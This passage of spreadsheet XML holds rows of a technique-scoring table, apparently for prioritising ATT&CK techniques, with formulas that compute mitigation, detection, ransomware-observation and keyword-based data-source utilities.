      </c>
      <c r="Z567" s="37">
        <v>0</v>
      </c>
      <c r="AA567" s="37">
        <v>0</v>
      </c>
      <c r="AB567" s="37">
        <v>0</v>
      </c>
      <c r="AC567" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD567" s="50"/>
      <c r="AE567" s="37" t="str" cm="1">
        <f t="array" ref="AE567">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD567)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF567" s="37">
        <v>563</v>
      </c>
      <c r="AG567" s="37" t="str" cm="1">
        <f t="array" ref="AG567">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD567)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH567" s="37">
        <v>563</v>
      </c>
      <c r="AI567" s="37" t="str" cm="1">
        <f t="array" ref="AI567">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD567)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ567" s="37">
        <v>563</v>
      </c>
      <c r="AK567" s="37" t="str" cm="1">
        <f t="array" ref="AK567">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD567)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL567" s="37">
        <v>563</v>
      </c>
      <c r="AM567" s="37" t="str" cm="1">
        <f t="array" ref="AM567">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD567)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN567" s="37">
        <v>0</v>
      </c>
      <c r="AO567" s="37">
        <v>0</v>
      </c>
      <c r="AP567" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ567" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>37.550000000000004</v>
      </c>
      <c r="AR567" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS567" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT567" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU56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68" spans="1:47" ht="34">
      <c r="A568" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B568" s="37">
        <f t="shared" si="8"/>
        <v>177.33571428571429</v>
      </c>
      <c r="C568" s="37" t="s">
        <v>1889</v>
      </c>
      <c r="D568" s="50" t="s">
        <v>1882</v>
      </c>
      <c r="E568" s="37" t="s">
        <v>1890</v>
      </c>
      <c r="F568" s="37">
        <v>0</v>
      </c>
      <c r="G568" s="37">
        <v>1</v>
      </c>
      <c r="H568" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I568" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J568" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K568" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L568" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M568" s="37">
        <v>0</v>
      </c>
      <c r="N568" s="56">
        <v>0</v>
      </c>
      <c r="O568" s="56">
        <v>1</v>
      </c>
      <c r="P568" s="56">
        <v>0</v>
      </c>
      <c r="Q568" s="56">
        <v>5</v>
      </c>
      <c r="R568" s="57"/>
      <c r="S568" s="57">
        <v>0</v>
      </c>
      <c r="T568" s="57"/>
      <c r="U568" s="57">
        <v>0</v>
      </c>
      <c r="V568" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>2.8571428571428567E-2</v>
      </c>
      <c r="W568" s="37">
        <v>0</v>
      </c>
      <c r="X568" s="37">
        <v>0</v>
      </c>
      <c r="Y568" s="37">
        <v>0</v>
      </c>
      <c r="Z568" s="37">
        <v>6</v>
      </c>
      <c r="AA568" s="37">
        <v>0.06</v>
      </c>
      <c r="AB568" s="37">
        <v>0.06</v>
      </c>
      <c r="AC568" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD568" s="50"/>
      <c r="AE568" s="37" t="str" cm="1">
        <f t="array" ref="AE568">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD568)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF568" s="37">
        <v>564</v>
      </c>
      <c r="AG568" s="37" t="str" cm="1">
        <f t="array" ref="AG568">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD568)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH568" s="37">
        <v>564</v>
      </c>
      <c r="AI568" s="37" t="str" cm="1">
        <f t="array" ref="AI568">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD568)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ568" s="37">
        <v>564</v>
      </c>
      <c r="AK568" s="37" t="str" cm="1">
        <f t="array" ref="AK568">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD568)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL568" s="37">
        <v>564</v>
      </c>
      <c r="AM568" s="37" t="str" cm="1">
        <f t="array" ref="AM568">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD568)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN568" s="37">
        <v>0</v>
      </c>
      <c r="AO568" s="37">
        <v>0</v>
      </c>
      <c r="AP568" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ568" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>59.111904761904761</v>
      </c>
      <c r="AR568" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS568" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT568" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU56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69" spans="1:47" ht="34">
      <c r="A569" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B569" s="37">
        <f t="shared" si="8"/>
        <v>123.81666666666666</v>
      </c>
      <c r="C569" s="37" t="s">
        <v>1891</v>
      </c>
      <c r="D569" s="50" t="s">
        <v>1892</v>
      </c>
      <c r="E569" s="37"/>
      <c r="F569" s="37">
        <v>0</v>
      </c>
      <c r="G569" s="37">
        <v>1</v>
      </c>
      <c r="H569" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I569" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J569" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K569" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L569" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M569" s="37">
        <v>0</v>
      </c>
      <c r="N569" s="56">
        <v>0</v>
      </c>
      <c r="O569" s="56">
        <v>0</v>
      </c>
      <c r="P569" s="56">
        <v>0</v>
      </c>
      <c r="Q569" s="56">
        <v>1</v>
      </c>
      <c r="R569" s="57"/>
      <c r="S569" s="57">
        <v>0</v>
      </c>
      <c r="T569" s="57"/>
      <c r="U569" s="57">
        <v>0</v>
      </c>
      <c r="V569" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>4.7619047619047615E-3</v>
      </c>
      <c r="W569" s="37">
        <v>0</v>
      </c>
      <c r="X569" s="37">
        <v>0</v>
      </c>
      <c r="Y569" s="37">
        <v>0</v>
      </c>
      <c r="Z569" s="37">
        <v>1</v>
      </c>
      <c r="AA569" s="37">
        <v>0.01</v>
      </c>
      <c r="AB569" s="37">
        <v>0.01</v>
      </c>
      <c r="AC569" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD569" s="50" t="s">
        <v>1808</v>
      </c>
      <c r="AE569" s="37" t="str" cm="1">
        <f t="array" ref="AE569">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD569)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF569" s="37">
        <v>565</v>
      </c>
      <c r="AG569" s="37" t="str" cm="1">
        <f t="array" ref="AG569">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD569)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH569" s="37">
        <v>565</v>
      </c>
      <c r="AI569" s="37" t="str" cm="1">
        <f t="array" ref="AI569">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD569)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ569" s="37">
        <v>565</v>
      </c>
      <c r="AK569" s="37" t="str" cm="1">
        <f t="array" ref="AK569">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD569)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL569" s="37">
        <v>565</v>
      </c>
      <c r="AM569" s="37" t="str" cm="1">
        <f t="array" ref="AM569">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD569)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN569" s="37">
        <v>0</v>
      </c>
      <c r="AO569" s="37">
        <v>1</v>
      </c>
      <c r="AP569" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ569" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>41.272222222222219</v>
      </c>
      <c r="AR569" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS569" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT569" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU56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1.0064814814814813</v>
      </c>
    </row>
    <row r="570" spans="1:47" ht="34">
      <c r="A570" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B570" s="37">
        <f t="shared" si="8"/>
        <v>113.25</v>
      </c>
      <c r="C570" s="37" t="s">
        <v>1893</v>
      </c>
      <c r="D570" s="50" t="s">
        <v>1892</v>
      </c>
      <c r="E570" s="37" t="s">
        <v>1894</v>
      </c>
      <c r="F570" s="37">
        <v>0</v>
      </c>
      <c r="G570" s="37">
        <v>1</v>
      </c>
      <c r="H570" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I570" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J570" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K570" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L570" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M570" s="37">
        <v>0</v>
      </c>
      <c r="N570" s="56">
        <v>0</v>
      </c>
      <c r="O570" s="56">
        <v>0</v>
      </c>
      <c r="P570" s="56">
        <v>0</v>
      </c>
      <c r="Q570" s="56">
        <v>0</v>
      </c>
      <c r="R570" s="57"/>
      <c r="S570" s="57">
        <v>0</v>
      </c>
      <c r="T570" s="57"/>
      <c r="U570" s="57">
        <v>0</v>
      </c>
      <c r="V570" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W570" s="37">
        <v>0</v>
      </c>
      <c r="X570" s="37">
        <v>0</v>
      </c>
      <c r="Y570" s="37">
        <v>0</v>
      </c>
      <c r="Z570" s="37">
        <v>0</v>
      </c>
      <c r="AA570" s="37">
        <v>0</v>
      </c>
      <c r="AB570" s="37">
        <v>0</v>
      </c>
      <c r="AC570" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD570" s="50" t="s">
        <v>1808</v>
      </c>
      <c r="AE570" s="37" t="str" cm="1">
        <f t="array" ref="AE570">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD570)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF570" s="37">
        <v>566</v>
      </c>
      <c r="AG570" s="37" t="str" cm="1">
        <f t="array" ref="AG570">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD570)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH570" s="37">
        <v>566</v>
      </c>
      <c r="AI570" s="37" t="str" cm="1">
        <f t="array" ref="AI570">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD570)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ570" s="37">
        <v>566</v>
      </c>
      <c r="AK570" s="37" t="str" cm="1">
        <f t="array" ref="AK570">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD570)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL570" s="37">
        <v>566</v>
      </c>
      <c r="AM570" s="37" t="str" cm="1">
        <f t="array" ref="AM570">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD570)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN570" s="37">
        <v>0</v>
      </c>
      <c r="AO570" s="37">
        <v>0</v>
      </c>
      <c r="AP570" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ570" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>37.75</v>
      </c>
      <c r="AR570" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS570" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT570" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU57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71" spans="1:47" ht="34">
      <c r="A571" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B571" s="37">
        <f t="shared" si="8"/>
        <v>113.45</v>
      </c>
      <c r="C571" s="37" t="s">
        <v>1895</v>
      </c>
      <c r="D571" s="50" t="s">
        <v>1892</v>
      </c>
      <c r="E571" s="37" t="s">
        <v>1896</v>
      </c>
      <c r="F571" s="37">
        <v>0</v>
      </c>
      <c r="G571" s="37">
        <v>1</v>
      </c>
      <c r="H571" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I571" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J571" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K571" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L571" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M571" s="37">
        <v>0</v>
      </c>
      <c r="N571" s="56">
        <v>0</v>
      </c>
      <c r="O571" s="56">
        <v>0</v>
      </c>
      <c r="P571" s="56">
        <v>0</v>
      </c>
      <c r="Q571" s="56">
        <v>0</v>
      </c>
      <c r="R571" s="57"/>
      <c r="S571" s="57">
        <v>0</v>
      </c>
      <c r="T571" s="57"/>
      <c r="U571" s="57">
        <v>0</v>
      </c>
      <c r="V571" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W571" s="37">
        <v>0</v>
      </c>
      <c r="X571" s="37">
        <v>0</v>
      </c>
      <c r="Y571" s="37">
        <v>0</v>
      </c>
      <c r="Z571" s="37">
        <v>0</v>
      </c>
      <c r="AA571" s="37">
        <v>0</v>
      </c>
      <c r="AB571" s="37">
        <v>0</v>
      </c>
      <c r="AC571" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD571" s="50" t="s">
        <v>1808</v>
      </c>
      <c r="AE571" s="37" t="str" cm="1">
        <f t="array" ref="AE571">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD571)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF571" s="37">
        <v>567</v>
      </c>
      <c r="AG571" s="37" t="str" cm="1">
        <f t="array" ref="AG571">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD571)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH571" s="37">
        <v>567</v>
      </c>
      <c r="AI571" s="37" t="str" cm="1">
        <f t="array" ref="AI571">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD571)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ571" s="37">
        <v>567</v>
      </c>
      <c r="AK571" s="37" t="str" cm="1">
        <f t="array" ref="AK571">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD571)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL571" s="37">
        <v>567</v>
      </c>
      <c r="AM571" s="37" t="str" cm="1">
        <f t="array" ref="AM571">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD571)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN571" s="37">
        <v>0</v>
      </c>
      <c r="AO571" s="37">
        <v>0</v>
      </c>
      <c r="AP571" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ571" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>37.81666666666667</v>
      </c>
      <c r="AR571" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS571" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT571" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU57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72" spans="1:47" ht="34">
      <c r="A572" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B572" s="37">
        <f t="shared" si="8"/>
        <v>146.12142857142857</v>
      </c>
      <c r="C572" s="37" t="s">
        <v>1897</v>
      </c>
      <c r="D572" s="50" t="s">
        <v>1892</v>
      </c>
      <c r="E572" s="37" t="s">
        <v>1898</v>
      </c>
      <c r="F572" s="37">
        <v>0</v>
      </c>
      <c r="G572" s="37">
        <v>1</v>
      </c>
      <c r="H572" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I572" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J572" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K572" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L572" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M572" s="37">
        <v>0</v>
      </c>
      <c r="N572" s="56">
        <v>0</v>
      </c>
      <c r="O572" s="56">
        <v>3</v>
      </c>
      <c r="P572" s="56">
        <v>0</v>
      </c>
      <c r="Q572" s="56">
        <v>0</v>
      </c>
      <c r="R572" s="57"/>
      <c r="S572" s="57">
        <v>0</v>
      </c>
      <c r="T572" s="57"/>
      <c r="U572" s="57">
        <v>0</v>
      </c>
      <c r="V572" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>1.4285714285714284E-2</v>
      </c>
      <c r="W572" s="37">
        <v>0</v>
      </c>
      <c r="X572" s="37">
        <v>0</v>
      </c>
      <c r="Y572" s="37">
        <v>0</v>
      </c>
      <c r="Z572" s="37">
        <v>3</v>
      </c>
      <c r="AA572" s="37">
        <v>0.03</v>
      </c>
      <c r="AB572" s="37">
        <v>0.03</v>
      </c>
      <c r="AC572" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD572" s="50"/>
      <c r="AE572" s="37" t="str" cm="1">
        <f t="array" ref="AE572">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD572)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF572" s="37">
        <v>568</v>
      </c>
      <c r="AG572" s="37" t="str" cm="1">
        <f t="array" ref="AG572">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD572)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH572" s="37">
        <v>568</v>
      </c>
      <c r="AI572" s="37" t="str" cm="1">
        <f t="array" ref="AI572">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD572)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ572" s="37">
        <v>568</v>
      </c>
      <c r="AK572" s="37" t="str" cm="1">
        <f t="array" ref="AK572">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD572)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL572" s="37">
        <v>568</v>
      </c>
      <c r="AM572" s="37" t="str" cm="1">
